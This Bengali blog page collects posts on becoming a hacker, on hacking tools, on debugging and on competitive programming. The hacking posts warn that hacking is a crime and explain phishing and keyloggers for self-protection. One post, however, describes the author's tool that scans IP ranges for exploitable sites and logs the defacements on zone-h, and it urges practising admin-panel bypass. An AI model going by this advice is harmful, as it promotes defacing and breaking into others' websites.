Facebook massage

Friday, December 30, 2016

হ্যাকার হতে বেসিক শিখাটা কি খুব জরুরি?

হ্যাকার হতে বেসিক শিখাটা কি খুব জরুরি?
হ্যাকার হওয়ার অনেকের শখ!দেশ ও দশের উপকারে ঝাপিয়ে পড়তে চাওয়া সৈনিকদের যেন অস্ত্রের অনেক অভাব!ইশ!যদি আমারও সে অস্ত্র থাকতো, তবে আমিও না কতোই উপকারে আসতে পারতাম দেশের!আহা!কত ভাব!ফেসবুকে গর্ব করে পোষ্ট করতে পারতাম ফেসবুকে “হ্যাকড বাই মি, খালি রুট করা বাকি!”
ভাই!থামেন!হ্যাকিং করে দেশের উপকার না, বাংলাদেশ এর সাইবার ক্রাইম আইনের অন্তর্ভুক্ত একজন অপরাধী হতে চাচ্ছেন আপনি অথচ আপনি নিজেও সেটা জানেন না।হ্যাকিং একটি সাইবার অপরাধ।জেনে শুনে অপরাধী হতে চাইলে কিছু বলার নাই, পড়ে যেতে থাকেন।আগেই বলে রাখি, ফেসবুক আইডি হ্যাক হয় বলে যারা জানেন, আসলে ফেসবুক আইডি যে চালায়, তার “ছাগলামির ফল” তাকে পোহাতে হবেই।কিছু করার নাই।কারন তারা আবাল।না চিনে ভাল করে ইন্টারনেট চালাইতে, না ভাল ফেসবুক চালাইতে।বাঁশ তো তাদের প্রাপ্য।তবুও ফেসবুক আইডি হ্যাক হবার কিছু সিস্টেম বলিঃ
১. ফিশিং সাইটঃ পিচ্চি পোলাপানও আজ এইটা চিনে।ফেসবুকের মতোই দেখতে ফেক(নকল) ফেসবুক লগিন পেজ।(কিভাবে তৈরি করে, আমার গলায় ছুরি ধরলেও বলব না।বিদায় হোন।)
২.কি-লগারঃ পিসি যারা ব্যবহার করেন, ভাল এন্টি-ভাইরাস চালান ভাই।নাইলে এর খপ্পরে পড়লে আপনার কি-বোর্ডে যা লিখবেন, হ্যাকারের কাছে চলে যাবে।বাকি কি হইবে, মাথা খাটাইয়া বুঝিয়া লইবেন।কারো দেওয়া সফটওয়্যার ১০০ বার স্ক্যান করে ইন্সটল করতে মনে থাকে যেন।
৩.কুকি হাইজ্যাকিংঃ আপনি ফেসবুকে একবার লগিন করলে আপনার লগিন করা থাকা অবস্থার কিছু গোপন আইডেন্টিটি ফেসবুক আপনার ব্রাউজারে রেখে দেয় যাকে কুকি বলে।এর ফলে আপনার ফেসবুকে বার-বার লগিন করা লাগে না।কুকি যদি হাইজ্যাক করা হয়, তবে আপনার লগিন থাকা অবস্থায় আপনি যা করেন, হ্যাকারও তা করতে পারবে(আই মিন, আপনি আপনার আইডি তাকে শেয়ার করে দিয়েছেন :P )।
আর নাই। -_- দূরে গিয়া মরেন।এবার নিজেকে নিরাপদ রাখবেন কিভাবে?হ্যা।আপনি আবাল :D আপনার আইডি নিরাপদ রাখতে পারেন না।যার বুদ্ধি আছে, সে নিরাপদ রাখার কৌশল জানে।যাই হোক, মাইন্ড কইরেন না :p I was just kidding(আসলেই আপনি আবাল), আপনি মোবাইল চালালে facebook.com(আগে পিছে কিছু নাই -_- ) লিখে লগিন করছেন কিনা দেখে নিন।পিসি চালক হলে আপনাকে ভাল এন্টি-ভাইরাসের সান্নিধ্যে থাকতে হবে।আর হ্যা, কোন লিঙ্কে যাবার আগে সাবধানে ক্লিক করবেন(আলতো করে), আরে ধুর।যে লিঙ্কে যাচ্ছেন, সেটা ট্রাস্টেড কিনা, কনফার্ম হয়ে নিন।
আসি প্রো-লেভেলের জিনিসে B-) ওয়েবসাইট হ্যাকিং এর কিছু কথায়।আর কোন হ্যাকিং এর জ্ঞান আমার নাই :3 এবং আমি “সবজান্তা” নই।
নোটের যে হেডলাইন আছে, সে বিষয়ে কথা হবে এবার।আসলে বেসিক বলতে আমি কি বুঝাই আর অন্যরা কি বুঝায়?
আমি বুঝাই, বেসিক হল হ্যাকিং জগতে আসার পর আপনার নতুন কিছু জিনিসের নামের সাথে পরিচয় হয়।যেমন শেল,ডিফেস,মিরর,ব্যাকডোর,রুট,সার্ভার ইত্যাদি।আমি বেসিক বলতে সেটা বুঝাই।অন্যরা বেসিক বলতে বুঝায়
“ভাই, কোন কথা নাই।প্রোগ্রামিং শিখো।”
“কি প্রোগ্রামিং ভাইয়া??”
“এইতো, php,c,c++,vb,c#,python,ajax,css,html,perl,java,javascript,pascal”
“এগুলা শিখলেই হবে ভাই?”
“হবে না মানে?আলবৎ হবে!একদম ১৩৩৭ হয়া যাবা”
“আচ্ছা ভাই।”
কয়েকদিন পর, “ভাই php,c এই ২ টা শিখছি হালকা।বেসিক পারি”
“আচ্ছা, তাইলে SQL injection শুরু কর”
অতঃপর তিনি মারা গেলেন।কেউ হয়তো ১৩৩৭ হইলেন, বাকিরা কোথায় যে হারিয়ে গেলেন খবর পাওয়া গেল না।
ভাই,এরা আসলে আবাল।এই যে একগাদা প্রোগ্রামিং ল্যাংগুয়েজ এর নাম দিল, সে নিজেও এগুলা ভাল পারে না।প্রোগ্রামিং ভাষা একটা ভাল করে পারলেই হয়(ট্রাস্ট মি, আমি নিজেও এভাবে অন্যকে সাজেস্ট করতাম -_- ওই যে, দেখাদেখি :P)।হাজারটা লাগে না।
এই আর কি।তো, একজন হ্যাকার হতে হলে আপনাকে আগে “Geek” হতে হবে।হ্যাকার ২ দিনে হয় না কেউ।বিশ্বাস করেন।কিন্তু সবার তাড়া!আমাকে যে আজই হ্যাকার হতে হবে!দেশ আমার অপেক্ষায়!শ্ত্রুর থেকে দেশকে বাচাতে হবে যে!
সিরিয়াসলি ভাই? :P হাসাইলেন।হ্যাকিং দিয়া দেশের কিছু আসে যায় না ভাই, সো এভাবে দেশপ্রেম দেখাইয়েন না।সাইবার ওয়ার নামে যা দেখেন, সেটা ডিফেস করে শো-অফ ছাড়া একটা “বাল(হিন্দি)” ও না।দেশ এ থেকে কিছু অর্জন করছে না।এর থেকে প্রোগ্রামিং করলে নিজের পেটও চালাতে পারবেন, দেশের আইটি সেকটরের উন্নয়নেও কাজ করতে পারবেন।
যাই হোক, যাদের হ্যাকার হবার ইচ্ছা, তারা শুনেনঃ
১. ধরে নিলাম, আপনি ইন্টারনেট এর সবকিছু খুজে বের করতে পারেন,ভাল প্রোগ্রামিং জানেন,এবং নিজের নিরাপত্তা দেবার ক্ষমতা আছে।হ্যাকিং এর বেসিক(আমি বেসিক বলতে যা বুঝাই সেটা) আপনার জানা আছে।(আমার আগের নোটে এ সম্পর্কিত বই আছে।ডাউনলোড কয়জন করেছেন কে জানে।আমার মাথাব্যাথা না কারন আপনাকে হ্যাকার বানাতে মেশিন বানিয়ে আমি বসে নাই -_- )
২. youtube.com এ যান। লিখুন “how to hack a website”
৩. যা ভিডিও আসবে, দেখতে থাকেন।একটা ও বুঝেন না?তাইলে আপনার বেসিক ক্লিয়ার না।সো আপনার হ্যাকার হবার যোগ্যতা নাই :)
আবারো বলছি, যারা জানতে চান শুরু কোথা থেকে করবেনঃ
ভাই, আসলেই কি আমার কথা শুনবেন?অনেক সময় দিবেন?যদি দেন, তবে বলি।
১. ওয়েব ডেভেলপমেন্ট শিখেন(এতে করে আপনি php,SQL(SQLi না) শিখে যাবেন)।এরপর হ্যাকিং এর বেসিক(আমি যেটা বলেছি) শিখেন।যেহেতু php,mySQL পারেন, এবং ওয়েব অ্যাপ্লিকেশান সম্পর্কে আপনার ভাল ধারনা তৈরি হবে, আপনি সহজে অনেক কিছু ক্যাচ করতে পারবেন।মুখস্ত হ্যাকার হবার কোন মানে হয় না!
২. ১ নং এর মতো শুরু না করতে চাইলে আপনি ২ দিন পর মাটিতে মিশে যাবেন।বলে রাখলাম।আপনি যদি ভাবেন, আপনাকে ২-৪ টা সিস্টেম দেখাইয়া দিলে মুখস্ত করে অনেক কিছু করে ফেলতে পারবেন, তবে আমার থেকে দূরে গিয়া মরেন ভাই।কারন, আমি ওসব গাইড দেই না।হাতে ধরে কেউ কাউকে শিখায় না।ধৈর্য ধরতে শিখেন, তবেই একদিন না একদিন পারবেন।আজ পর্যন্ত আমি যা শিখেছি, আল্লাহর কাছে শুকরিয়া আদায় করি, কারন আমি ধৈর্য ধরে রাখতে পেরেছিলাম।অনেকেই আছে ধৈর্যের অভাবে ছিটকে পড়ে গেছে অনেক আগেই।এ জগতে আপনার চারপাশে নিন্দুকের অভাব হবে না।কাজেই এদের অবহেলা করুন।সবচেয়ে বড় ব্যাপার হল আপনার ইচ্ছা।এবং গুগল আপনাকে সেবা দিয়ে প্রস্তুত।আপনি সেটা নিতে পারেন না, সে আপনার দুর্বলতা।সেটা আগে কাটান, তবেই না আগাবেন!সব কি এতোই সহজ?হ্যা, বিপদে পড়লে আমি আপনার পাশেই থাকবো আল্লাহ যতদিন বাঁচিয়ে রাখেন।তবে, হাতে কলমে কেউ শেখাতে আসবে না, সেটা নিশ্চিত থাকুন।কারন, আপনাকে শেখাতে তখনই কেউ আনন্দ পাবে যখন আপনি মিনিমাম জ্ঞানসম্পন্ন কেউ হবেন।কেউ পাঠশালা খুজে বসে নেই যে আপনাকে কম্পিউটার,ইন্টারনেট ভাল করে চালাতে শিখাবে আবার হ্যাকিং শিখিয়েও দিবে!জীবনটা এতো সহজ না ভাই।টাকা দিয়ে হ্যাকিং শিখতে যাবেন না, এতে আপনারই লস হবে। ভাল থাকবেন :)
আমি সর্বদাই “ফেসবুক আইডি হ্যাক করা শিখাবেন ভাই” টাইপ যে কাউকে সমবেদনা জানাই।
আর অনুরোধ রইল, হ্যাকিং শিখার জন্য কারো চামচামি করা শুরু করবেন না দয়া করে :) আপনি নিশ্চয়ই এতোটা চিপ মাইন্ডের কেউ নন :) মনে রাখবেন, আজ সে যে পর্যায়ে, কাল আপনি তার থেকেও অনেক উপরে চলে যেতে পারেন।সো, চিল :D
Keep faith in yourself and Almighty Allah. If you really have that quality, you can do it today or tomorrow ...

হ্যাকিং টুলস!আসলেই কি কাজের? ও অন্যান্য ...

হ্যাকিং টুলস!আসলেই কি কাজের? ও অন্যান্য ...
আপনারা হয়তো দোটানায় থাকতে পারেন যে হ্যাকিং এর টুলস আছে?থাকলেও কি কাজের?নাকি লোক দেখানো?আসলে, ব্যাপারটা হল, টুলস বলতে আমরা কি বুঝি?একটা সফটওয়্যার।কি কাজ করে এটি?আপনাকে স্বয়ংক্রিয়ভাবে কাজ করে দেয়।
আলোচনা করব প্রোগ্রামিং এর ব্যবহার কিভাবে হ্যাকিং এ প্রভাব ফেলে সে ব্যাপারে।তবে হয়তো বুঝতে পারবেন প্রোগ্রামিং আপনাকে কতটা কাজে সাহায্য করার উপযোগী।(ফেসবুক হ্যাকিং এর জন্য হা করে যারা বসে আছেন, তাদের জন্য “ভাই, বিষ কিনে দেই, খেয়ে মরে যান?”)
একটা প্রোগ্রামিং ভাষা আপনাকে একটা ওয়েবসাইটে লগিন করা থেকে ধরে সাইটের সব কাজ স্বয়ংক্রিয়ভাবে করার সুবিধা দিয়ে থাকে।অনেকে নিশ্চয়ই অনলাইন চ্যাটবট ব্যবহার করেছেন।আসলে সে সব বট প্রোগ্রামিং এর একটা জ্বলন্ত উদাহরণ।আপনি লজিকের সাথে কথা বলছেন।সেটা আপনাকে আপনার লজিক অনুযায়ী উত্তর দিচ্ছে।এইভাবে প্রোগ্রামিং দিয়ে আপনার যা মন চায়, তা করতে পারবেন।আরেকটা উদাহরণ হতে পারে অটো লাইক এবং কমেন্ট এর ব্যবহার।তো, গুরুত্ব আর না বুঝাই।চলে যাই মূল প্রসঙ্গে ...
হ্যাকিং করতে তো জানতে হবে আগে!তা ছাড়া আপনি প্রোগ্রাম বানাবেন কি অন্ধকারে ঢিল ছুঁড়ে?যারা বলে “সকল প্রোগ্রামারই হ্যাকার,কিন্তু সকল হ্যাকার প্রোগ্রামার নয়” আবার “সকল হ্যাকারই প্রোগ্রামার, কিন্তু সকল প্রোগ্রামার হ্যাকার নয়”, এটা আসলে কথা হতে পারে না।কারন, প্রোগ্রামিং এর সবকিছু এলগরিদমে চলে।একজন প্রোগ্রামার হ্যাকারদের কাজের এলগরিদম জানে না।আবার হ্যাকার যে প্রোগ্রামারই হবে, বর্তমানে সেটার গ্যার‍্যান্টি কে দিবে?
ওসব যুক্তিতর্ক বাদ দিলাম।কাজে আসি।তো, কিভাবে একটা হ্যাকিং এর টুল বানানো হয়?আমি যখন এই টুল তৈরি করেছিলাম, সেটার কথাই বলি।টুল তৈরি করতে হলে আমাকে প্রথমে আমার কাজের একটা খসড়া তৈরি করে নিতে হয়।আমার এই টুলের কাজের ধাপগুলো ছোট করেঃ
১. যে ব্যবহার করবে, তার কিছু তথ্য নিয়ে নিয়েছি।
২. সে কি করতে চায়, সেটা জানতে চেয়েছি।আমি আইপি রেঞ্জ এর মধ্যে টার্গেট সাইট খোজার অথবা একটা সাইট টেস্ট করার ব্যবস্থা করেছিলাম।
৩. যখন কাজ দেওয়া হয় টুলকে, সেটা দেখে সাইটে এক্সপ্লোয়েট কাজ করে কিনা।এবার বলবেন জানি “ভাই, এক্সপ্লোয়েট কি?”, উত্তরঃ “আমার আগের নোটগুলাতে উত্তর আছে।”।
৪. যদি করে, তবে তা হ্যাকিং এর তথ্য রাখার সাইট “www.zone-h.org” তে সেভ করতে চেষ্টা করবে।যদি ১ বছরের মধ্যে সে সাইট কেউ হ্যাক না করে থাকে, তবে তা সফল হবে।
আসি সেই এক্সপ্লোয়েটটা নিয়ে কিছু কথায়।এটি সাধারন একটা এক্সপ্লোয়েট।এর দ্বারা কেউ একটা লিঙ্কে নিজের লিখা ইঞ্জেক্ট করে দিতে পারে এবং সেটা আবার পুনরায় কেউ রি ইঞ্জেক্ট না করার আগ পর্যন্ত সেভ থাকে যা ডিফেসিং বলে গণ্য হয়।কাজেই সেটা জোন-এইচে সেভ করে রাখা যায়।এই ছিল এই টুলের কাজ।
যদি বলেন, “সরাসরি হোমপেইজে আমার ডিফেস পেজ বসাই দেওয়ার কোন টুল নাই?”, উত্তরঃ “না ভাই।আমার সঠিক জানা নাই।”।
এখানে গেলে যে টুলের কথা বলছিলাম, তার সোর্স কোড দেখতে পাবেন।
তো, এরকম টুল বানাতে কি শিখতে হয়েছিল আমার?সবার আগেই বলব একটা প্রোগ্রামিং ভাষার অনেকাংশ শিখে ফেলতে হবে এবং এর ইন্টারনেট বেসড যেসব কাজ আছে(ওয়েবপেজ ফেচ করা,ডাটা পোষ্ট করা ইত্যাদি), তা শিখে নিতে হবে।নিজের এলগোরিদম তৈরি করে প্রোগ্রাম বানানোর দক্ষতা থাকতে হবে।আর মূল কথা, হ্যাকিং এর জ্ঞান তো থাকা লাগবে :P নাইলে কি প্রোগ্রাম বানাবেন?
হয়তো এতোটা পড়ার পর মনে হচ্ছে, নাহ।হ্যাকিং টুল তাইলে আছে।ভাই, থামেন।আছে।তার মানে এই না যে সবই “রিয়াল” জিনিস হবে।গুগলে “facebook account hacking tool” লিখে সার্চ দিন।দেখেন অনেক টুল আসবে।একটা যদি ইন্সটল করেন, আপনি নিজেই হ্যাক হয়ে যাবেন :v
কাজেই টুল ব্যবহার করার আগে সাবধান।আপনার অবগতির জন্য, একজন প্রোগ্রামার + হ্যাকার আপনার পিসি(কম্পিউটার) এর সম্পূর্ণ কন্ট্রোল নিয়ে নিতে পারে একটা মাত্র প্রোগ্রাম আপনাকে দিয়ে ইন্সটল করিয়ে।একে বলা হয় র‍্যাট(ইদুর না!রিমোট এডমিনিস্ট্রেশন টুল) বা ট্রোজান।অন্য নাম বলা যেতে পারে কি-লগার যা আপনার কীবোর্ডের লিখা ট্র্যাক করে হ্যাকারকে প্রেরন করতে পারে।আগে নিজে নিরাপদ থেকে অন্যের নিরাপত্তা ভাঙ্গার চিন্তা করবেন।অন্যথায় বাঁশ ভালভাবেই খেতে হবে আপনার :)
ভালমানের এন্টিভাইরাস প্রোগ্রাম ব্যবহার করবেন নিরাপদ থাকতে।তবে, হ্যাকাররাও কম যায় না।আপনার এন্টিভাইরাস বাইপাসও তারা করতে জানে।তাই, সাবধানে রাস্তা পার হবেন।ডানে বামে গাড়ী দেখে রাস্তা পার হোন, দেশ ও দশের উপকার করুন।প্রতিদিন ২ টা করে গাছ লাগান, পরিবেশ বাঁচান।২ টি সন্তানের বেশি নয়, ১ টি হলে ভাল হয়।
ওহ!দুঃখিত, অনেক লম্বা নোট, তাই আপনাকে বোরড হবার থেকে ফিরিয়ে আনতে একটা জোক ছিল মাত্র।তো, আবার চলে আসি কাজের কথায়।
খালি কি প্রোগ্রামিং শিখলেই হ্যাকার হওয়া যায়?না।সেটা না।হ্যাকার হবার জন্য আলাদা জ্ঞান নিতে হয়।কেউ হ্যাকার হতে চায়, আগে কি জানতে হবে?নিচের কিছু বিষয় আগে একজনের থাকা লাগবেইঃ
১. ইনফরমেশন - টেকনোলোজিতে অফুরন্ত আগ্রহ।
২. ইলেকট্রনিক জিনিস এর ত্রুটি ঠিক করে ফেলার দক্ষতা, অন্তত আগ্রহ।
৩. ফেসবুক স্পেশালিষ্ট :P [আজকাল শুনি, “আমি আর কিছু না পারি, ফেসবুকের ৯৯% জানা আছে আমার”]
৪. মোবাইল স্পেশালিষ্ট :P [অনেকেই বলে, “আর কিছুতে আমি দুর্বল হলেও মোবাইলের ব্যাপারে আমাকে পেছনে ফেলতে পারবে না কেউ”]
৫. ওয়েব ডেভেলপমেন্ট স্কিল।
৬. অনেক সময় ইন্টারনেটে ব্যয় করার ধৈর্য এবং আগ্রহ।(সেটা ফেসবুকে না ভাই।ইন্টারনেট মানেই ফেসবুক না।)
৭. ব্রেইন এবং জ্ঞান (আবাল কেউ হ্যাকিং জীবনেও শিখতে পারবে না।আবালের বৈশিষ্ট্যগুলো আর নাই বললাম)
হ্যা, এগুলা থাকলে আপনার যোগ্যতা আছে বলতে হবে।এবার আপনি হ্যাকিং এর কিছু বেসিক শিখতে হবে।এই বইটি পড়া শুরু করুন এবং ১০০% শেষ করুন।আরো পরিষ্কার ধারনার জন্য একই জিনিস গুগলেও খুজুন।সব শেষ হয়ে গেলে এবার হ্যাকিং এর সবথেকে সহজ সিস্টেম “এডমিন প্যানেল বাইপাস” চেষ্টা করুন এবং সফলতা না পাওয়া পর্যন্ত চালিয়ে যান।
“Patience is the key to success”
আপনি যখন দেখবেন পারছেন, সু-স্বাগতম :)
জেনে রাখুন, “যারা SQL injection এর জন্য সময় নষ্ট করেছে, তাদের থেকে অন্যরা বেশি সফল, যারা সেটা ফলো করেনি কারন হ্যাকিং এর শুরু সেটা না।দুনিয়ার কঠিন জিনিস সেটা যেখানে সাফল্যের সম্ভাবনা অনেক কম :) আসলেই তাই”।
আর হ্যা, সবাই হ্যাকার হতে পারে না এবং কেউ আপনাকে হ্যাকার বানাতেও বসে নেই।হ্যাকিং শিখতে কাউকে টাকা অফার করবেন না, কারন শিখতে পারবেন না।আর, ইউটিউবে দেখা একটা সিস্টেম ২ বার চেষ্টা করে না পেরে হাল ছেড়ে দিলে আমার পক্ষ থেকে আপনার জন্য “১ বোতল সমবেদনা” রইল।
আরেকটা ব্যাপার পরিষ্কার করি, “কালি লিনাক্স”। “ভাই, শুনেছি কালি লিনাক্স নামে একটা এপস আছে যেটা দিয়ে সব হ্যাক করা যায়।সত্যি নাকি?”।
না ভাই, কালি লিনাক্স হ্যাক করার এপস না।এটা একটা অপারেটিং সিস্টেম।ভাগ্য ভাল, এর ডেভেলপাররা “হ্যাক করার এপস” কথাটা শুনে নি।শুনলে পৃথিবী ছেড়ে চলে যেত।এটা ব্যবহার না করেও হ্যাক করা যায়।সেটা সাধারন মোবাইল(ইন্টারনেট চলে এবং ভাল ব্রাউজার আছে এমন) দিয়েও হয়। “কি?সত্যি?যাহ!মজা করছেন!”।হ্যা ভাই, মজা করছি।এইবার মুড়ি খান :) টুল ছাড়াও হ্যাকিং করা যায়, সেটা ভুললে চলবে না ... :)
যাই হোক, অনেক কথা লিখলাম।আজ থাক।
Hacking is an art, but patience is the key to that art ...

আপনার প্রোগ্রামটি ডিবাগ করবেন কিভাবে?

আপনার প্রোগ্রামটি ডিবাগ করবেন কিভাবে?
আমরা অনেকেই কোড করার পর নিজের কোডের ভূল খুজে বের করতে পারি না।আজকে আমরা দেখব কিভাবে নিজের প্রোগ্রামের বাগগুলো খুজে বের করবেন।
প্রোগ্রাম তৈরি করার আগে এলগোরিদম সেট করে নিয়ে কোডিং শুরু করুন।যখন পুরো কোড লিখা শেষ, রান করে দেখুন আপনি যা চাচ্ছেন তা আউটপুট আসছে কিনা।যদি না আসে, তবে আমার নোট পড়ার জন্য আপনি যোগ্য।
আমাদের জানতে হবে প্রোগ্রামে বাগ ঠিক কোথায় কোথায় দেখা যায়।
হতে পারে আপনি যেখানে ইনপুট নিচ্ছেন, সেটার ফরম্যাট স্পেসিফায়ার অথবা ভেরিয়েবল নেইম আপনি ভূল লিখে ফেলেছেন।হতে পারে আপনার সেট করা কন্ডিশন আপনারই অজান্তে এমনভাবে দিয়ে দিয়েছেন যার কারনে ফলাফলই ভিন্ন আসছে।আবার এমন হতে পারে, বড় সংখ্যার জন্য ফলাফল আসছে না কারন আপনি কম মেমরি সেট করে দিয়েছেন।সিনট্যাক্স এরর এর সমাধানে না গেলাম, সেটা নিজের জ্ঞান দিয়ে সমাধান করে নিবেন।আমার নোটের উদ্দেশ্য, আপনাকে সেইসব অতিক্ষুদ্র ভুল সম্পর্কে অবগত করা যেখানে আপনার চোখ যাবার আগেই আপনি আরেকজনের কাছে সাহায্যের জন্য চলে যান।পোগ্রামিং এর ক্ষেত্রে আপনার সেরাটা দিয়ে নিজের ভুল সমাধান করার চেষ্টা করেও যদি কিছু কুলাতে না পারেন, তবে সাহায্যের জন্য যেতে পারেন।
তো, আমরা কোড করার সময় ভুল পেলাম না, এখন এই ভুল কই হচ্ছে, তা বের করব কিভাবে?
আমাদের সেইসব জায়গায় চেক করতে হবে যেখানে সাধারনত ভুল হয়ে থাকে।তো, চলুন দেখা যাক কিভাবে বাগ ফিক্স করা যায়।
নিজের কাজগুলো করতে পারেনঃ
প্রথমে আপনার ইনপুট ভেরিয়েবলের ভ্যালু ইনপুট নেবার সাথে সাথেই প্রিন্ট করে দেখুন।ভুল থাকতে পারে।ভেরিয়েবল নামগুলো আবার দেখুন।যেখানে গানিতিক কাজ করেছেন, সেখানে ভেরিয়েবলে কি সেভ হচ্ছে অথবা আপনার যেরকম ফলাফল দরকার সেরকম ফলাফল আসছে কিনা।ভুল বের হয়ে যাবে।কন্ডিশনাল লজিক,কম্পারিজন অপারেটর এর কোন একটা কম লিখে ফেললেন কিনা পুনরায় চেক করুন।এর পরেও সমাধান না পেলে কোড আবার প্রথম থেকে সিনট্যাক্স সহ কোথায় কি করেছেন, কি বেশি লিখেছেন অথবা লিখতে ভুলে গেছেন তা চেক করে নিন।এর পরেও যদি না হয়, আপনার এলগোরিদম এ ভুল আছে :) নতুন করে এলগরিদম অনুযায়ী এগুতে হবে আপনাকে।অথবা বিশেষজ্ঞ কারো সাহায্য নিতে পারেন :)
প্রোগ্রামিং করার সময় কমেন্ট করে করে প্রোগ্রাম লিখার অভ্যাস করুন, এতে আপনার জন্য যেমন ভাল, আপনার কোড যে দেখবে, তারও আপনার এপ্রোচ বুঝতে সুবিধা হবে।আর হ্যা, আরেকটা জিনিস হল মেমরি এলোকেশন।আপনার কত বড় ডাটা নিতে হবে তার উপর ভিত্তি করে ভেরিয়েবল সেট করে নিন।এরর এবং এক্সেপশন হ্যান্ডেল করে কোড করুন যাতে করে আপনার কোড আপনার প্রোগ্রাম ব্যবহারকারী ভুল ইনপুট দিলে একটা এরর ম্যাসেজ দিয়ে সতর্ক করে দিতে পারে।কমেন্ট করে করে প্রোগ্রাম লিখার একটা সুবিধা হল আপনার প্রয়োজনমতো এলগোরিদম চলছে কিনা চেক করে করে কোড করতে পারবেন :) এবং আপনার এলগোরিদম ভুল হলে নিজেই বুঝতে পারবেন যে আপনি তো কোড ঠিক করছেন না!
কম্পিটিটিভ প্রোগ্রামিং(এসিএম) করতে চেষ্টা করুন।এতে আপনি ইফিশিয়েন্ট প্রোগ্রাম ডেভেলপার হতে পারবেন :) একজন সাধারন প্রোগ্রামার এবং এসিএম প্রোগ্রামার এর মধ্যে পার্থক্য হল, সাধারন প্রোগ্রামার এর থেকে এসিএম প্রোগ্রামার এর কোড অনেক বেশি বাগমুক্ত এবং ইফিশিয়েন্ট কারন, সে জানে তার প্রোগ্রাম এর জন্য কি কি জিনিস এর প্রতি খেয়াল রাখা লাগে।আপনি হয়তো মেমরি,টাইম কমপ্লেক্সিটি,বাগ নিয়ে চিন্তাও করবেন না, কিন্তু এসিএম প্রোগ্রামার সেটা নিয়ে চিন্তা করতে পারে এবং আপনার প্রোগ্রাম হতে তার প্রোগ্রাম অনেক বেশি গ্রহনযোগ্য হবে।কম্পিটিটিভ প্রোগ্রামিং(এসিএম) করার অনেক ব্লগ গুগলে আছে, ফলো করতে পারেন।
সব কথার শেষ কথা, প্রোগ্রামিং জিনিসটা ব্রেইনের চিন্তা করার উপর নির্ভর করে।আপনি যদি ক্রিয়েটিভ এবং দ্রুত এলগোরিদম বের/তৈরি করতে না পারেন, ভাল প্রোগ্রামার হতে পারবেন না।আর হ্যা, হাজার হাজার প্রোগ্রামিং ভাষা শিখার চেয়ে একটা ভাষায় বস হয়ে যান, লাইফ হয়ে যাবে :D
বেস্ট অফ লাক...

কম্পিটিটিভ প্রোগ্রামিং সম্পর্কে কিছু কথা

কম্পিটিটিভ প্রোগ্রামিং সম্পর্কে কিছু কথা
কম্পিটিটিভ প্রোগ্রামিং হল এমন ধরনের একটা প্রোগ্রামিং প্রতিযোগিতা যেখানে বিভিন্ন প্রোগ্রামাররা কিছু নির্ধারিত সমস্যা প্রোগ্রাম করে সমাধান করে থাকে।গড়ে ৫ ঘন্টা সময়ের মধ্যে ৬ টা থেকে ১০ টা সমস্যা সমাধান করতে দেওয়া হয়ে থাকে এ ধরনের প্রতিযোগিতায়।তবে,সাধারনত প্রতিযোগিতা হয় টিম নির্ভর।একটি টিমে ১ থেকে ৩ জন সদস্য থাকতে পারে।বিভিন্ন প্রতিষ্ঠান এ ধরনের প্রতিযোগিতার আয়োজন করে থাকে।সেটা একটা দেশের মধ্যে অথবা সারা বিশ্বের অনেক শিক্ষাপ্রতিষ্ঠান এর মধ্যে হতে পারে।কিছু প্রোগ্রামিং প্রতিযোগিতার মধ্যে ACM ICPC উল্লেখযোগ্য।গুগলে খুজলে আরো বিস্তারিত জানতে পারবেন।এই প্রতিযোগিতা অনেকটা আন্তর্জাতিক গনিত অলিম্পিয়াড এর মতোই।এছাড়াও অনেক বিশ্ববিদ্যালয় এ ধরনের প্রতিযোগিতা আয়োজন করে থাকে।যাই হোক, বাকিসব গুগল ঘেটে জেনে নিবেন।
কথা হল,কম্পিটিটিভ প্রোগ্রামিং করে লাভ কি হয় অথবা কি ধরনের প্রশ্ন থাকে, এরকম অনেক প্রশ্ন মাথায় আসা স্বাভাবিক।সো,আমি কিছু বিষয় আলোচনা করব এবং এর বাইরেও কিছু জানার থাকলে গুগল তো আছেই।প্রথমে আসি প্রব্লেম কি দেওয়া থাকে?নিচে একটা সমস্যা লক্ষ্য করুন।

Number of Digits

Shakil always loves to fun with children. One day shakil asks his 5 years old cousin Nishi, to solve a problem. Shakil says “I will Give you an integer (0 – 1000). Now tells me, how many digits contain that integer? “ . Nishi is totally stuck in this problem. Can you help Nishi to make a smile on her little face?

Input:

First line of the input will consist of an integer which represent the test case T (0 < T <= 1001). Each test case contains an integer X (0 <= X <= 1000).

Output:

For every test case, print number of digits of X.

Sample Input

2
1
30

Sample Output

1
2
এই সমস্যাটি আমি এখান থেকে নিয়েছি।আমাকে এমনভাবে কোড করতে হবে যেন আমার কোড Standard Input নিয়ে Standard Output print করে।এখন,কোন ল্যাংগুয়েজ দিয়ে সমাধান করা লাগবে?ICPC Standard এ শুধুমাত্র C,C++,Java দিয়ে সমাধান করতে পারবেন।এছাড়াও কিছু অনুশীলন ওয়েবসাইট আছে যাকে বলা হয় “অনলাইন জাজ” যেখানে এ ধরনের সমস্যা দেওয়া থাকে এবং আপনার সমাধান সাবমিট করার পর স্বয়ংক্রিয়ভাবে তা কিছু নির্ধারিত ইনপুটের সাথে আউটপুট মিলিয়ে দেখা হয় এবং যদি মিলে যায়,তবে ফলাফল “Accepted” আসবে।সেসব সাইটে অবশ্য আপনি C,C++,Java,C#,Python সহ অনেক ভাষায় সমাধান সাবমিট করতে পারবেন।উপরের প্রশ্ন পড়ে দেখুন।সমস্যার সুচনাতে একটা প্রেক্ষাপট দেওয়া থাকে এবং কি করতে হবে বলা হয়।অনেককিছু input and output এ ও দেওয়া থাকে অনেকসময়।সেভাবে প্রোগ্রাম তৈরি করতে হয়।কাজেই,প্রোগ্রামিং এ মোটামুটি দক্ষ হলেই কম্পিটিটিভ প্রোগ্রামিং করা যাবে।তবে গণিতে দক্ষ হতেই হবে!প্রোগ্রামিং চলে এলগরিদমের উপর।কাজেই এলগরিদমের অনেক জায়গায় গনিত লাগবেই।আপনাকে ইনপুট নিতে হবে(ধরুন সি তে scanf দিয়ে) এবং সাধারন প্রিন্ট করতে হবে।sample input output দেওয়া হয় আপনার কোড সঠিক সমাধান করছে কিনা চেক করার জন্য।তবে,সাবমিট করার পর যে সব টেস্ট কেস মেলানো হবে,তা গোপন থাকে।কাজেই আপনি চালাকি করতে পারবেন না।কারো কোড কপি পেষ্ট করা নাজায়েজ!নিজে যতোটা পারেন,তা দিয়ে সমাধান করতে হবে।প্রয়োজনে টিমে আলোচনা করতে পারবেন।নিজে চর্চা করতে অনেক সাইট আছে।কয়েকটিঃ
